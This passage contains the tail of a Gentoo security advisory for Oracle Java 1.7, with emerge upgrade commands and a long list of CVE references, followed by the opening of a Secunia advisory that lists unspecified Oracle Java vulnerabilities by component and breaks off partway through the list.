existing packages to be marked stable by their
architecture maintainers. Please review the CVE identifiers referenced below for
details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.51"
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.51"
All users of the precompiled 32-bit Oracle JRE should upgrade to the
latest version:
# emerge --sync
# emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.51"
All Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one
of the newer Oracle packages like dev-java/oracle-jdk-bin or
dev-java/oracle-jre-bin or choose another alternative we provide; eg.
the IBM JDK/JRE or the open source IcedTea.
NOTE: As Oracle has revoked the DLJ license for its Java
implementation, the packages can no longer be updated automatically.
References
==========
[ 1 ] CVE-2011-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563
[ 2 ] CVE-2011-5035
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035
[ 3 ] CVE-2012-0497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497
[ 4 ] CVE-2012-0498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498
[ 5 ] CVE-2012-0499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499
[ 6 ] CVE-2012-0500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500
[ 7 ] CVE-2012-0501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501
[ 8 ] CVE-2012-0502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502
[ 9 ] CVE-2012-0503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503
[ 10 ] CVE-2012-0504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504
[ 11 ] CVE-2012-0505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505
[ 12 ] CVE-2012-0506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506
[ 13 ] CVE-2012-0507
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507
[ 14 ] CVE-2012-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547
[ 15 ] CVE-2012-1531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531
[ 16 ] CVE-2012-1532
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532
[ 17 ] CVE-2012-1533
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533
[ 18 ] CVE-2012-1541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541
[ 19 ] CVE-2012-1682
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682
[ 20 ] CVE-2012-1711
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711
[ 21 ] CVE-2012-1713
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713
[ 22 ] CVE-2012-1716
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716
[ 23 ] CVE-2012-1717
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717
[ 24 ] CVE-2012-1718
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718
[ 25 ] CVE-2012-1719
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719
[ 26 ] CVE-2012-1721
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721
[ 27 ] CVE-2012-1722
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722
[ 28 ] CVE-2012-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723
[ 29 ] CVE-2012-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724
[ 30 ] CVE-2012-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725
[ 31 ] CVE-2012-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726
[ 32 ] CVE-2012-3136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136
[ 33 ] CVE-2012-3143
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143
[ 34 ] CVE-2012-3159
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159
[ 35 ] CVE-2012-3174
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174
[ 36 ] CVE-2012-3213
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213
[ 37 ] CVE-2012-3216
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216
[ 38 ] CVE-2012-3342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342
[ 39 ] CVE-2012-4416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416
[ 40 ] CVE-2012-4681
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681
[ 41 ] CVE-2012-5067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067
[ 42 ] CVE-2012-5068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068
[ 43 ] CVE-2012-5069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069
[ 44 ] CVE-2012-5070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070
[ 45 ] CVE-2012-5071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071
[ 46 ] CVE-2012-5072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072
[ 47 ] CVE-2012-5073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073
[ 48 ] CVE-2012-5074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074
[ 49 ] CVE-2012-5075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075
[ 50 ] CVE-2012-5076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076
[ 51 ] CVE-2012-5077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077
[ 52 ] CVE-2012-5079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079
[ 53 ] CVE-2012-5081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081
[ 54 ] CVE-2012-5083
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083
[ 55 ] CVE-2012-5084
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084
[ 56 ] CVE-2012-5085
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085
[ 57 ] CVE-2012-5086
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086
[ 58 ] CVE-2012-5087
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087
[ 59 ] CVE-2012-5088
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088
[ 60 ] CVE-2012-5089
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089
[ 61 ] CVE-2013-0169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169
[ 62 ] CVE-2013-0351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351
[ 63 ] CVE-2013-0401
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401
[ 64 ] CVE-2013-0402
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402
[ 65 ] CVE-2013-0409
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409
[ 66 ] CVE-2013-0419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419
[ 67 ] CVE-2013-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422
[ 68 ] CVE-2013-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423
[ 69 ] CVE-2013-0430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430
[ 70 ] CVE-2013-0437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437
[ 71 ] CVE-2013-0438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438
[ 72 ] CVE-2013-0445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445
[ 73 ] CVE-2013-0446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446
[ 74 ] CVE-2013-0448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448
[ 75 ] CVE-2013-0449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449
[ 76 ] CVE-2013-0809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809
[ 77 ] CVE-2013-1473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473
[ 78 ] CVE-2013-1479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479
[ 79 ] CVE-2013-1481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481
[ 80 ] CVE-2013-1484
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484
[ 81 ] CVE-2013-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485
[ 82 ] CVE-2013-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486
[ 83 ] CVE-2013-1487
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487
[ 84 ] CVE-2013-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488
[ 85 ] CVE-2013-1491
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491
[ 86 ] CVE-2013-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493
[ 87 ] CVE-2013-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500
[ 88 ] CVE-2013-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518
[ 89 ] CVE-2013-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537
[ 90 ] CVE-2013-1540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540
[ 91 ] CVE-2013-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557
[ 92 ] CVE-2013-1558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558
[ 93 ] CVE-2013-1561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561
[ 94 ] CVE-2013-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563
[ 95 ] CVE-2013-1564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564
[ 96 ] CVE-2013-1569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569
[ 97 ] CVE-2013-1571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571
[ 98 ] CVE-2013-2383
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383
[ 99 ] CVE-2013-2384
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384
[ 100 ] CVE-2013-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394
[ 101 ] CVE-2013-2400
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400
[ 102 ] CVE-2013-2407
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407
[ 103 ] CVE-2013-2412
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412
[ 104 ] CVE-2013-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414
[ 105 ] CVE-2013-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415
[ 106 ] CVE-2013-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416
[ 107 ] CVE-2013-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417
[ 108 ] CVE-2013-2418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418
[ 109 ] CVE-2013-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419
[ 110 ] CVE-2013-2420
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420
[ 111 ] CVE-2013-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421
[ 112 ] CVE-2013-2422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422
[ 113 ] CVE-2013-2423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423
[ 114 ] CVE-2013-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424
[ 115 ] CVE-2013-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425
[ 116 ] CVE-2013-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426
[ 117 ] CVE-2013-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427
[ 118 ] CVE-2013-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428
[ 119 ] CVE-2013-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429
[ 120 ] CVE-2013-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430
[ 121 ] CVE-2013-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431
[ 122 ] CVE-2013-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432
[ 123 ] CVE-2013-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433
[ 124 ] CVE-2013-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434
[ 125 ] CVE-2013-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435
[ 126 ] CVE-2013-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436
[ 127 ] CVE-2013-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437
[ 128 ] CVE-2013-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438
[ 129 ] CVE-2013-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439
[ 130 ] CVE-2013-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440
[ 131 ] CVE-2013-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442
[ 132 ] CVE-2013-2443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443
[ 133 ] CVE-2013-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444
[ 134 ] CVE-2013-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445
[ 135 ] CVE-2013-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446
[ 136 ] CVE-2013-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447
[ 137 ] CVE-2013-2448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448
[ 138 ] CVE-2013-2449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449
[ 139 ] CVE-2013-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450
[ 140 ] CVE-2013-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451
[ 141 ] CVE-2013-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452
[ 142 ] CVE-2013-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453
[ 143 ] CVE-2013-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454
[ 144 ] CVE-2013-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455
[ 145 ] CVE-2013-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456
[ 146 ] CVE-2013-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457
[ 147 ] CVE-2013-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458
[ 148 ] CVE-2013-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459
[ 149 ] CVE-2013-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460
[ 150 ] CVE-2013-2461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461
[ 151 ] CVE-2013-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462
[ 152 ] CVE-2013-2463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463
[ 153 ] CVE-2013-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464
[ 154 ] CVE-2013-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465
[ 155 ] CVE-2013-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466
[ 156 ] CVE-2013-2467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467
[ 157 ] CVE-2013-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468
[ 158 ] CVE-2013-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469
[ 159 ] CVE-2013-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470
[ 160 ] CVE-2013-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471
[ 161 ] CVE-2013-2472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472
[ 162 ] CVE-2013-2473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473
[ 163 ] CVE-2013-3743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743
[ 164 ] CVE-2013-3744
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744
[ 165 ] CVE-2013-3829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829
[ 166 ] CVE-2013-5772
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772
[ 167 ] CVE-2013-5774
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774
[ 168 ] CVE-2013-5775
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775
[ 169 ] CVE-2013-5776
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776
[ 170 ] CVE-2013-5777
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777
[ 171 ] CVE-2013-5778
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778
[ 172 ] CVE-2013-5780
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780
[ 173 ] CVE-2013-5782
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782
[ 174 ] CVE-2013-5783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783
[ 175 ] CVE-2013-5784
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784
[ 176 ] CVE-2013-5787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787
[ 177 ] CVE-2013-5788
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788
[ 178 ] CVE-2013-5789
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789
[ 179 ] CVE-2013-5790
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790
[ 180 ] CVE-2013-5797
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797
[ 181 ] CVE-2013-5800
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800
[ 182 ] CVE-2013-5801
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801
[ 183 ] CVE-2013-5802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802
[ 184 ] CVE-2013-5803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803
[ 185 ] CVE-2013-5804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804
[ 186 ] CVE-2013-5805
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805
[ 187 ] CVE-2013-5806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806
[ 188 ] CVE-2013-5809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809
[ 189 ] CVE-2013-5810
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810
[ 190 ] CVE-2013-5812
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812
[ 191 ] CVE-2013-5814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814
[ 192 ] CVE-2013-5817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817
[ 193 ] CVE-2013-5818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818
[ 194 ] CVE-2013-5819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819
[ 195 ] CVE-2013-5820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820
[ 196 ] CVE-2013-5823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823
[ 197 ] CVE-2013-5824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824
[ 198 ] CVE-2013-5825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825
[ 199 ] CVE-2013-5829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829
[ 200 ] CVE-2013-5830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830
[ 201 ] CVE-2013-5831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831
[ 202 ] CVE-2013-5832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832
[ 203 ] CVE-2013-5838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838
[ 204 ] CVE-2013-5840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840
[ 205 ] CVE-2013-5842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842
[ 206 ] CVE-2013-5843
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843
[ 207 ] CVE-2013-5844
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844
[ 208 ] CVE-2013-5846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846
[ 209 ] CVE-2013-5848
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848
[ 210 ] CVE-2013-5849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849
[ 211 ] CVE-2013-5850
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850
[ 212 ] CVE-2013-5851
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851
[ 213 ] CVE-2013-5852
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852
[ 214 ] CVE-2013-5854
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854
[ 215 ] CVE-2013-5870
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870
[ 216 ] CVE-2013-5878
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878
[ 217 ] CVE-2013-5887
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887
[ 218 ] CVE-2013-5888
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888
[ 219 ] CVE-2013-5889
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889
[ 220 ] CVE-2013-5893
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893
[ 221 ] CVE-2013-5895
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895
[ 222 ] CVE-2013-5896
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896
[ 223 ] CVE-2013-5898
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898
[ 224 ] CVE-2013-5899
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899
[ 225 ] CVE-2013-5902
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902
[ 226 ] CVE-2013-5904
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904
[ 227 ] CVE-2013-5905
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905
[ 228 ] CVE-2013-5906
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906
[ 229 ] CVE-2013-5907
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907
[ 230 ] CVE-2013-5910
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910
[ 231 ] CVE-2014-0368
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368
[ 232 ] CVE-2014-0373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373
[ 233 ] CVE-2014-0375
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375
[ 234 ] CVE-2014-0376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376
[ 235 ] CVE-2014-0382
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382
[ 236 ] CVE-2014-0385
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385
[ 237 ] CVE-2014-0387
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387
[ 238 ] CVE-2014-0403
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403
[ 239 ] CVE-2014-0408
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408
[ 240 ] CVE-2014-0410
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410
[ 241 ] CVE-2014-0411
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411
[ 242 ] CVE-2014-0415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415
[ 243 ] CVE-2014-0416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416
[ 244 ] CVE-2014-0417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417
[ 245 ] CVE-2014-0418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418
[ 246 ] CVE-2014-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422
[ 247 ] CVE-2014-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423
[ 248 ] CVE-2014-0424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424
[ 249 ] CVE-2014-0428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201401-30.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Oracle Java Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA52064
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52064/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
RELEASE DATE:
2013-02-02
DISCUSS ADVISORY:
http://secunia.com/advisories/52064/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52064/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Oracle Java, which can
be exploited by malicious local users to gain escalated privileges and
by malicious people to disclose certain sensitive information,
manipulate certain data, cause a DoS (Denial of Service), and
compromise a vulnerable system.
1) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
2) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
3) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
4) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
5) An unspecified error in the AWT component of the client and server
deployment can be exploited to potentially execute arbitrary code.
6) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
7) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
8) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
9) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
10) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
11) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
12) An unspecified error in the JMX component of the client
deployment can be exploited to potentially execute arbitrary code.
13) An unspecified error in the JavaFX component of the client
deployment can be exploited to potentially execute arbitrary code.
14) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
15) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
16) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
17) An unspecified error in the Scripting component of the client
deployment can be exploited to potentially execute arbitrary code.
18) An unspecified error in the Sound component of the client
deployment can be exploited to potentially execute arbitrary code.
19) An unspecified error in the Beans component of the client
deployment can be exploited to potentially execute arbitrary code.
20) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
21) An unspecified error in the Deployment component of the client
